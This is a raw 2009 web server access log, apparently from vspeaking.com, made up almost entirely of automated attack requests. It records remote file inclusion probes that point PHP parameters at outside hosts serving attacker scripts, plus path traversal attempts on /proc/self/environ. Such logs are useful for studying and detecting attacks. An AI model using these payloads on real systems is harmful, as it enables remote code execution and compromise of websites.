69.175.14.66 - - [28/Jun/2009:21:22:48 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:22:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:22:50 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:22:50 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:22:50 -0700] "GET /logs/access.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:05 -0700] "GET /logs/access.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:05 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:05 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:09 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:09 -0700] "GET /logs/access.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:09 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:21 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:21 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:21 -0700] "GET /logs/access.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:33 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:33 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:23:33 -0700] "GET /logs/access.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:23:35 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:24:01 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [28/Jun/2009:21:24:06 -0700] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:21:24:49 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:21:24:49 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:21:24:49 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2376 "-" "libwww-perl/5.805" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:25:03 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:25:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:25:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:25:18 -0700] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:27:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:27:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:27:41 -0700] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:29:43 -0700] "GET /logs/access_090112.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:31:20 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:31:20 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:31:20 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:31:44 -0700] "GET /logs/access_090112.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:33 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:33 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:34 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:34 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:34 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:35 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:41 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:41 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:32:42 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:32:50 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:32:50 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:32:52 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:32:52 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:32:52 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:32:53 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [28/Jun/2009:21:33:12 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:33:20 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:41 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:42 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:43 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:44 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:44 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:44 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:45 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:45 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:45 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:45 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:45 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
91.195.124.16 - - [28/Jun/2009:21:35:45 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:37:32 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:37:33 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:39:51 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:39:52 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:39:53 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:40:34 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:40:35 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:40:35 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:40:57 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:40:58 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:40:58 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:40:58 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:40:58 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:40:58 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:40:59 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:40:59 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:40:59 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:17 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:17 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:19 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:19 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:19 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:19 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:19 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:21 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:32 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:32 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:41:33 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:44:06 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.223.3.98 - - [28/Jun/2009:21:44:13 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:44:42 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:44:42 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:44:42 -0700] "GET /logs/access_090413.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:44:44 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:44:44 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:44:44 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:44:48 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:44:48 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [28/Jun/2009:21:44:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:44:53 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:44:59 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:44:59 -0700] "GET /logs/access_090413.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:44:59 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:45:02 -0700] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:45:02 -0700] "GET /logs/access_090413.log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
151.1.219.156 - - [28/Jun/2009:21:45:02 -0700] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:45:23 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:46:00 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:46:02 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:46:19 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:46:27 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
